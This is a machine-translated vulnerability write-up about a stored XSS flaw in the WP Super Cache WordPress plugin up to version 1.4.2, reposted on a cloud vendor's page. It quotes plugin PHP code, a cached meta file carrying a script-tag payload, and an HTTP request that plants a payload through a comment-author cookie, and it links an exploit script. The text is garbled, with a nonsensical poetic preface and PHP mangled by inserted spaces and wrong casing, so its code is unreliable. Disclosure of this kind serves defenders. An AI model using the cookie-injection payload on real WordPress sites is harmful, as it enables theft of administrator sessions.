WP Super Cache & lt; = 1.4.2 stored XSS vulnerability analysis

Source: Internet
Author: User

WP Super Cache <= 1.4.2 stored XSS vulnerability analysis
Preface

The peak is the peak of the city.

At that moment, it seems like at this moment, there are many good people, and tree and grass fall in love, remember to stay away from yesterday!

The basic info. WP Super Cache static files that have not been cached and writes html files to the wp-contents/cache directory. A key is generated for a wordpress user (anonymous comment, author, Administrator, etc.). The key part is taken from the user cookie accessing the current page and the corresponding cache file is found based on the key. The plug-in background display page lists all cached files and keys. Because the key is not filtered, the plug-in background has the storage xss vulnerability. Trigger address: http: // 127.0.0.1/cms/wordpress/wp-admin/options-general.php? Page = wpsupercache & tab = contents & listfiles = 1 & _ wpnonce = b468360c30 # listfiles trigger: the code analysis plug-in hooks all pages to call the wp_super_cache_init function to initialize the plug-in. File: wp-super-cache.1.4.2 \ wp-cache-phase1.php line: 107

function wp_super_cache_init() {   .......   get_wp_cache_key()}

 

Get_wp_cache_key () call wp_cache_get_cookies_values file: wp-super-cache.1.4.2 \ wp-cache-phase1.php line: 360
Function wp_cache_get_cookies_values () {$ string = ''; $ regex ="/^ wp-postpass | ^ comment_author _ "; // No need to register for a comment. If (defined ('logged _ IN_COOKIE ') $ regex. = "| ^ ". preg_quote (constant ('logged _ IN_COOKIE '); else $ regex. = "| ^ wordpress_logged_in _"; // Common Logon user $ regex. = "/"; while ($ key = key ($ _ COOKIE) {if (preg_match ($ regex, $ key )) {if (isset ($ GLOBALS ['wp _ super_cache_debug ']) & $ GLOBALS ['wp _ super_cache_debug']) wp_cache_debug ("Usage: $ regex Cookie detected: $ key ", 5); $ string. = $ _ COOKIE [$ key]. ","; // directly retrieve the cookie without filtering} next ($ _ COOKIE);} reset ($ _ COOKIE); // If you use this hook, make sure you update your. htaccess rules with the same conditions $ string = do_cacheaction ('wp _ cache_get_cookies_values ', $ string); return $ string ;}

 

Check whether information such as cookies has been cached and written to wp-content \ cache \ meta directory such as file: wp-cache-94bbb0fe53ee08e617bce3f2d58f264f.meta
a:5:{s:7:"headers";a:4:{s:4:"Vary";s:12:"Vary: Cookie";s:12:"Content-Type";s:38:"Content-Type: text/html; charset=UTF-8";s:10:"X-Pingback";s:53:"X-Pingback: http://127.0.0.1/cms/wordpress/xmlrpc.php";s:13:"Last-Modified";s:44:"Last-Modified: Fri, 10 Apr 2015 06:08:45 GMT";}s:3:"uri";s:24:"127.0.0.1/cms/wordpress/";s:7:"blog_id";i:1;s:4:"post";i:0;s:3:"key";s:78:"127.0.0.180/cms/wordpress/<script>alert(0)</script>,x@baidu.com,http://2222,";}

 

Background display page WP Super Cache settings> content, key code.
File: wp-super-cache.1.4.2 \ wp-cache.php line: 2347 ksort ($ cached_list); // cache file list, read from wp-contents/cache folder. Foreach ($ cached_list as $ age => $ d) {foreach ($ d as $ details) {echo "<tr $ bg> <td> $ c </td> <a href = 'HTTP: // {$ details ['url']} '> ". $ details ['uri ']. "</a> </td> <td> ". str_replace ($ details ['url'], '', $ details ['key']). "</td> <td >{$ age} </td> <a href = '". wp_nonce_url (add_query_arg (array ('page' => 'psupercache', 'Action' => 'deletepcache', 'url' => base64_encode ($ details [ 'Uri ']), 'wp-cache '). "# listfiles '> X </a> </td> </tr> \ n"; $ flip =! $ Flip; $ c ++ ;}}

 

The variable $ details ['key'] is from a file in wp-content \ cache \ meta and is directly output without any filtering. The above analysis shows the vulnerability utilization. Send the following packets to generate a new cache and insert malicious scripts. GET/cms/wordpress/HTTP/1.1 Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 37.0) Gecko/20100101 Firefox/37.0 Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8Accept-Language: zh-CN, zh; q = 0.8, en-US; q = 0.5, en; q = 0.3Accept-Encoding: gzip, deflateCookie: comment_author_url _ {randstr }={ poc} {randstr} Connection: keep-alive simple exploit: https://github.com/yaseng/pentest/blob/master/exploit/wp-super-cache-xss-exploit.py

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.